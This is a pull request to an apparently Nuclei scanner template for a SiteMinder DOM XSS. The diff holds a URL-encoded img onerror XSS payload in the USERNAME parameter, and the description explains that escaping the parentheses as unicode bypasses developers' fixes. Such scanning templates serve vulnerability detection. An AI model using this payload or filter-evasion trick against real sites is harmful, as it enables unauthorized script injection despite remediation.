### PR TITLE
Update siteminder-dom-xss.yaml

### DIFF
--- a/http/vulnerabilities/other/siteminder-dom-xss.yaml
+++ b/http/vulnerabilities/other/siteminder-dom-xss.yaml
@@ -24,8 +24,8 @@ info:
 http:
   - method: GET
     path:
-      - '{{BaseURL}}/siteminderagent/forms/smpwservices.fcc?USERNAME=\u003cimg\u0020src\u003dx\u0020onerror\u003d\u0022confirm(document.domain)\u0022\u003e&SMAUTHREASON=7'
-      - '{{BaseURL}}/siteminderagent/forms/smaceauth.fcc?USERNAME=\u003cimg\u0020src\u003dx\u0020onerror\u003d\u0022confirm(document.domain)\u0022\u003e&SMAUTHREASON=7'
+      - '{{BaseURL}}/siteminderagent/forms/smpwservices.fcc?USERNAME=\u003cimg\u0020src\u003dx\u0020onerror\u003d\u0022confirm\u0028document.domain\u0029\u0022\u003e&SMAUTHREASON=7'
+      - '{{BaseURL}}/siteminderagent/forms/smaceauth.fcc?USERNAME=\u003cimg\u0020src\u003dx\u0020onerror\u003d\u0022confirm\u0028document.domain\u0029\u0022\u003e&SMAUTHREASON=7'
 
     stop-at-first-match: true
 


### PR DESCRIPTION
I have changed "(" and ")" to "U0028" and "U0029" to bypass the remediation.

### Template / PR Information

<!-- Explains the information and/or motivation for update or/ creating this templates -->
- I have tried to bypass remediation applied by developers. Hence, I found out that replacing "(" and ")" with "U0028" and "U0029" increases the effectiveness of templates.

### Template Validation

I've validated this template locally?
- [ ] YES

![image](https://github.com/user-attachments/assets/801106a6-4cd2-4d96-b5f0-5de1158aa083)



#### Additional Details (leave it blank if not applicable)

<!-- Include Shodan / Fofa / Google Query / Docker / Screenshots if available -->
<!-- Include HTTP/TCP/DNS Matched response data snippet if available -->
<!-- Please do NOT include vulnerable host information in pull requests -->
<!-- None of the prerequisites are obligatory; they are merely intended to speed the review process. -->

### Additional References:

- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)